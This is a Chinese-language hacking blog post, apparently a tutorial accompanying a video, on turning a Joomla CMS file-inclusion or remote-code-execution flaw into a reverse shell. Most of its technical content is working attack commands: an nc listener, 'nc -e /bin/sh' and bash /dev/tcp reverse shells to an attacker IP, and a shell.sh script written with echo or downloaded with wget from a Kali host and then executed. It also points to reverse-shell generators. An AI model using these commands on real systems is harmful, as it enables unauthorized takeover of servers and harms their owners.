![图片[1]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/06/20220612023850173-1024x574.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
相关阅读
我们之前讲过反弹shell(亦称反向shell,英文reverse shell)的原理
基于上面的原理,我们也分享了多期实战的视频
12个月前以及前几天分享的0day均是通过该原理
视频讲解
我们今天给大家分享joomla CMS系统文件包含、远程代码执行的漏洞,当我们发现一个可以执行命令的URL路径时,我们可以尝试通过直接执行反弹shell、也可以通过echo将其输出到文件,再执行文件,如果上述方法都不行的时候?我们还可以尝试通过wget或者curl命令来从网站上下载恶意脚本到本地,完成恶意脚本的执行,然后让服务器主动连接我们的监听端口,最终控制整台服务器!
图文讲解
监听端口等待反弹Shell连接
nc -nlvp 4444通用思路
当发现文件包含可以完成命令执行的时候,我们可以考虑通过下面三种方式来执行反弹shell的脚本
- 直接运行脚本
- echo生成脚本文件
- wget/Curl下载脚本文件
直接运行脚本
nc -e /bin/sh 192.168.0.192 4444![图片[2]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/06/20220612024336717-1024x555.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
bash -i >& /dev/tcp/192.168.0.192/4444 0>&1![图片[3]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/06/20220612024311849-1024x534.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
echo生成脚本文件
![图片[4]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/06/20220612024243707-1024x566.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
生成shell.sh
echo 'bash -i >& /dev/tcp/192.168.0.192/4444 0>&1' > shell.sh
然后给执行的权限
chmod 777 shell.sh最后运行脚本
bash shell.shwget/Curl下载脚本文件
这里我们事先在Kali linux上传好我们的恶意脚本,在目标系统中使用wget命令从Kali linux下载shell.sh这个文件
wget 192.168.0.192/shell.sh![图片[5]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/06/20220612024453555-1024x551.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
为了确保文件正常下载,我们还可以使用下面命令查看脚本文件
cat shell.sh![图片[6]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/06/20220612024619920-1024x575.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后给文件运行权限
chmod 777 shell.sh![图片[7]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/06/20220612024657649-1024x570.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
最终运行恶意脚本
bash shell.sh![图片[8]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/06/20220612024747227-1024x551.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后我们从Kali linux上就可以接管这台机器的终端了
![图片[9]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/06/20220612024930132-1024x573.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
常见的反弹shell在线生成
很多网友可能会疑惑了,反弹shell的命令有没有快捷生成的工具?这里当然是有了
![图片[10]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/06/20220612025038466-1024x705.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
当然除了在线生成,我们还可以通过浏览器插件,之前也讲过
![图片[11]-【视频讲解】黑客常用的远程命令执行实战及演示-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/06/20220612025222788.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
© 版权声明
THE END
- 最新
- 最热
只看作者